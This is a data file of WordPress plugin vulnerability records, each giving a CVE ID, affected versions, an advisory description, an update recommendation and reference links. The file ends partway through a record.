{"CVE_ID":"CVE-2024-3820","slug":"wpdatatables","versionImpact":"6.3.1","versionEndExcluding":"6.3.2","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to SQL Injection via the 'id_key' parameter of the wdt_delete_table_row AJAX action in all versions up to, and including, 6.3.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. Please note this only affects the premium version of the plugin.","recommendation":"Update to version 6.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbba822b-172f-4167-bccf-4697a298178e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fbba822b-172f-4167-bccf-4697a298178e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"name\":\"https:\\\/\\\/wpdatatables.com\\\/help\\\/whats-new-changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5803","slug":"business-directory-plugin","versionEndExcluding":"6.3.11","description":"Cross-Site Request Forgery (CSRF) vulnerability in Business Directory Team Business Directory Plugin \u2013 Easy Listing Directories for WordPress allows Cross-Site Request Forgery.This issue affects Business Directory Plugin \u2013 Easy Listing Directories for WordPress: from n\/a through 6.3.10.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/business-directory-plugin\\\/wordpress-business-directory-plugin-easy-listing-directories-for-wordpress-plugin-6-3-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/business-directory-plugin\\\/wordpress-business-directory-plugin-easy-listing-directories-for-wordpress-plugin-6-3-10-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7646","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.3.10","versionEndExcluding":"6.3.11","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom script parameter in all versions up to, and including, 6.3.10 even when the user does not have the unfiltered_html capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.3.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.3.11\\\/modules\\\/widgets\\\/tp_hovercard.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/6.3.11\\\/modules\\\/widgets\\\/tp_hovercard.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fcab5e-c82e-4072-9a86-94a7f18a6e56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58fcab5e-c82e-4072-9a86-94a7f18a6e56?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0187","slug":"peepso-core","versionImpact":"6.3.1.1","versionEndExcluding":"6.3.1.2","description":"The Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 6.3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4600411-bee1-4cc8-aee9-0a613ac9b55b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4600411-bee1-4cc8-aee9-0a613ac9b55b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7125","slug":"peepso-core","versionImpact":"6.3.1.1","versionEndExcluding":"6.3.1.2","description":"The Community by PeepSo WordPress plugin before 6.3.1.2 does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack","recommendation":"Update to version 6.3.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cac12b64-ed25-4ee2-933f-8ff722605271\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cac12b64-ed25-4ee2-933f-8ff722605271\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4971","slug":"weaverx-theme-support","versionImpact":"6.3.0","versionEndExcluding":"6.3.1","description":"The Weaver Xtreme Theme Support WordPress plugin before 6.3.1 unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import  a malicious file and a suitable gadget chain is present on the blog.","recommendation":"Update to version 6.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/421194e1-6c3f-4972-8f3c-de1b9d2bcb13\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/421194e1-6c3f-4972-8f3c-de1b9d2bcb13\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3598","slug":"woo-coupon-usage","versionImpact":"6.3.0","versionEndExcluding":"6.3.1","description":"The Coupon Affiliates \u2013 Affiliate Plugin for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the commission_summary parameter in all versions up to, and including, .6.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/6.2.2\\\/inc\\\/functions\\\/functions-all-time.php#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-coupon-usage\\\/tags\\\/6.2.2\\\/inc\\\/functions\\\/functions-all-time.php#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d6cf33c-ac40-4892-9345-64ebe61e6be6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d6cf33c-ac40-4892-9345-64ebe61e6be6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2877","slug":"formidable","versionEndExcluding":"6.3.1","description":"The Formidable Forms WordPress plugin before 6.3.1 does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33765da5-c56e-42c1-83dd-fcaad976b402\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/33765da5-c56e-42c1-83dd-fcaad976b402\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1809","slug":"download-manager","versionEndExcluding":"6.3.0","description":"The Download Manager WordPress plugin before 6.3.0 leaks master key information without the need for a password, allowing attackers to download arbitrary password-protected package files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57f0a078-fbeb-4b05-8892-e6d99edb82c1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/57f0a078-fbeb-4b05-8892-e6d99edb82c1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13838","slug":"uncanny-automator","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The Uncanny Automator \u2013 Easy Automation, Integration, Webhooks & Workflow Builder Plugin plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.2 via the 'call_webhook' method of the Automator_Send_Webhook class This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249921\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/webhooks\\\/class-automator-send-webhook.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249921\\\/uncanny-automator\\\/trunk\\\/src\\\/core\\\/lib\\\/webhooks\\\/class-automator-send-webhook.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29eeac86-6b33-49e6-a7e1-c80dee383d6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29eeac86-6b33-49e6-a7e1-c80dee383d6f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5311","slug":"wp-extra","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The WP EXtra plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register() function in versions up to, and including, 6.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to modify the contents of the .htaccess files located in a site's root directory or \/wp-content and \/wp-includes folders and achieve remote code execution.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/giongfnef.gitbook.io\\\/giongfnef\\\/cve\\\/cve-2023-5311\",\"name\":\"https:\\\/\\\/giongfnef.gitbook.io\\\/giongfnef\\\/cve\\\/cve-2023-5311\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87e3dd5e-0d77-4d78-8171-0beaf9482699?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/87e3dd5e-0d77-4d78-8171-0beaf9482699?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0250","slug":"analytics-insights","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The Analytics Insights for Google Analytics 4 (AIWP) WordPress plugin before 6.3 is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/321b07d1-692f-48e9-a8e5-a15b38efa979\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/321b07d1-692f-48e9-a8e5-a15b38efa979\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5907","slug":"file-manager","versionEndExcluding":"6.3","description":"The File Manager WordPress plugin before 6.3 does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f250226f-4a05-4d75-93c4-5444a4ce919e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f250226f-4a05-4d75-93c4-5444a4ce919e\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5314","slug":"wp-extra","versionImpact":"6.2","versionEndExcluding":"6.3","description":"The WP EXtra plugin for WordPress is vulnerable to unauthorized access to restricted functionality due to a missing capability check on the 'test-email' section of the register() function in versions up to, and including, 6.2. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to send emails with arbitrary content to arbitrary locations from the affected site's mail server.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93c10a58-c5f2-440b-a88e-5314143fdd90?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/93c10a58-c5f2-440b-a88e-5314143fdd90?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2977703\\\/wp-extra\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3246","slug":"litespeed-cache","versionImpact":"6.2.0.1","versionEndExcluding":"6.3","description":"The LiteSpeed Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0.1. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the token setting and inject malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8036bd83-9af5-4b71-8974-9b0690ea6769?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8036bd83-9af5-4b71-8974-9b0690ea6769?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123399\\\/litespeed-cache\\\/trunk\\\/src\\\/cloud.cls.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123399\\\/litespeed-cache\\\/trunk\\\/src\\\/cloud.cls.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1093","slug":"miniorange-login-with-eve-online-google-facebook","versionEndExcluding":"6.24.2","description":"The OAuth Single Sign On WordPress plugin before 6.24.2 does not have CSRF checks when discarding Identify providers (IdP), which could allow attackers to make logged in admins delete all IdP via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e13b9ea-a3ef-483b-b967-6ec14bd6d54d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1e13b9ea-a3ef-483b-b967-6ec14bd6d54d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1092","slug":"miniorange-login-with-eve-online-google-facebook","versionEndExcluding":"6.24.2","description":"The OAuth Single Sign On Free WordPress plugin before 6.24.2, OAuth Single Sign On Standard WordPress plugin before 28.4.9, OAuth Single Sign On Premium WordPress plugin before 38.4.9 and OAuth Single Sign On Enterprise WordPress plugin before 48.4.9 do not have CSRF checks when deleting Identity Providers (IdP), which could allow attackers to make logged in admins delete arbitrary IdP via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52e29f16-b6dd-4132-9bb8-ad10bd3c39d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/52e29f16-b6dd-4132-9bb8-ad10bd3c39d7\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5eb85df5-8aab-4f30-a401-f776a310b09c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5eb85df5-8aab-4f30-a401-f776a310b09c\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fbf7efe-0bf2-42c6-aef1-7fcf2708b31b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8fbf7efe-0bf2-42c6-aef1-7fcf2708b31b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6e165d9-2193-4c76-ae2d-618a739fe4fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f6e165d9-2193-4c76-ae2d-618a739fe4fb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10881","slug":"lu-radioplayer","versionImpact":"6.24.11.07","versionEndExcluding":"6.24.11.15","description":"The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.24.11.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\\\/#release-notes\",\"name\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\\\/#release-notes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ed8a7f8-1af3-4b41-bfaf-fd1c35baa867?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10816","slug":"lu-radioplayer","versionImpact":"6.24.01.24","versionEndExcluding":"6.24.11.07","description":"The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.24.01.24 via the js\/fallback.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 6.24.11.07, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544f71f5-1798-40fd-9f55-c25dae4f557a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/544f71f5-1798-40fd-9f55-c25dae4f557a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\",\"name\":\"https:\\\/\\\/radioplayer.luna-universe.com\\\/update\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4445","slug":"wp-compress-image-optimizer","versionImpact":"6.20.01","versionEndExcluding":"6.20.02","description":"The WP Compress \u2013 Image Optimizer [All-In-One] plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the several functions in versions up to, and including, 6.20.01. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to edit plugin settings, including storing cross-site scripting, in multisite environments.","recommendation":"Update to version 6.20.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/830f53a4-da3b-4a95-99f1-c4a4c8e6944c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/830f53a4-da3b-4a95-99f1-c4a4c8e6944c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/trunk\\\/classes\\\/mu.class.php?rev=2946135\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/trunk\\\/classes\\\/mu.class.php?rev=2946135\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/#file655\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/#file655\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6812","slug":"wp-compress-image-optimizer","versionImpact":"6.20.01","versionEndExcluding":"6.20.02","description":"The WP Compress \u2013 Image Optimizer [All-In-One plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 6.20.01. This is due to insufficient validation on the redirect url supplied via the 'css' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"Update to version 6.20.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbf9fbb-74fd-42eb-a781-2a720fe56b13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbbf9fbb-74fd-42eb-a781-2a720fe56b13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/wp-compress-image-optimizer\\\/trunk\\\/fixCss.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082085\\\/wp-compress-image-optimizer\\\/trunk\\\/fixCss.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4681","slug":"hide_my_wp","versionEndExcluding":"6.2.9","description":"The Hide My WP WordPress plugin before 6.2.9 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a4096e8-abe4-41c4-b741-c44e740e8689\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a4096e8-abe4-41c4-b741-c44e740e8689\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6557","slug":"the-events-calendar","versionImpact":"6.2.8.2","versionEndExcluding":"6.2.9","description":"The The Events Calendar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.2.8.2 via the route function hooked into wp_ajax_nopriv_tribe_dropdown. This makes it possible for unauthenticated attackers to extract potentially sensitive data including post titles and IDs of pending, private and draft posts.","recommendation":"Update to version 6.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc40196e-c0f3-4bc6-ac4b-b866902def61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc40196e-c0f3-4bc6-ac4b-b866902def61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010104%40the-events-calendar%2Ftags%2F6.2.9&old=3010096%40the-events-calendar%2Ftags%2F6.2.9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3010104%40the-events-calendar%2Ftags%2F6.2.9&old=3010096%40the-events-calendar%2Ftags%2F6.2.9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6203","slug":"the-events-calendar","versionEndExcluding":"6.2.8.1","description":"The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request","recommendation":"Update to version 6.2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229273e6-e849-447f-a95a-0730969ecdae\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229273e6-e849-447f-a95a-0730969ecdae\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5211","slug":"fattura24","versionImpact":"6.2.7","versionEndExcluding":"6.2.8","description":"The Fattura24 WordPress plugin before 6.2.8 does not sanitize or escape the 'id' parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting vulnerability.","recommendation":"Update to version 6.2.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa868380-cda7-4ec6-8a3f-d9fa692908f2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa868380-cda7-4ec6-8a3f-d9fa692908f2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0276","slug":"weaverx-theme-support","versionEndExcluding":"6.2.7","description":"The Weaver Xtreme Theme Support WordPress plugin before 6.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d00824a3-7df5-4b52-a31b-5fdfb19c970f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d00824a3-7df5-4b52-a31b-5fdfb19c970f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5034","slug":"wp-file-download","versionImpact":"6.2.5","versionEndExcluding":"6.2.6","description":"The wp-file-download WordPress plugin before 6.2.6 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting","recommendation":"Update to version 6.2.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd9aa9f-3da9-4457-922f-975bef6e33f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebd9aa9f-3da9-4457-922f-975bef6e33f8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0329","slug":"chatbot","versionImpact":"6.2.3","versionEndExcluding":"6.2.4","description":"The AI ChatBot for WordPress  WordPress plugin before 6.2.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 6.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db101819-4404-46c9-a02e-b1b1b7ace11e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/db101819-4404-46c9-a02e-b1b1b7ace11e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8451","slug":"essential-addons-for-elementor-lite","versionImpact":"6.2.2","versionEndExcluding":"6.2.3","description":"The Essential Addons for Elementor \u2013 Popular Elementor Templates & Widgets plugin for WordPress is vulnerable to DOM-Based Stored Cross-Site Scripting via the \u2018data-gallery-items\u2019 parameter in all versions up to, and including, 6.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/assets\\\/front-end\\\/js\\\/view\\\/filterable-gallery.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/assets\\\/front-end\\\/js\\\/view\\\/filterable-gallery.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344071\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344071\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4917652a-1c83-4570-98c5-1a34e637814e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4917652a-1c83-4570-98c5-1a34e637814e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1287","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"6.2.2","versionEndExcluding":"6.2.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown, Syntax Highlighter, and Page Scroll widgets in all versions up to, and including, 6.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.2.3, or a newer patched 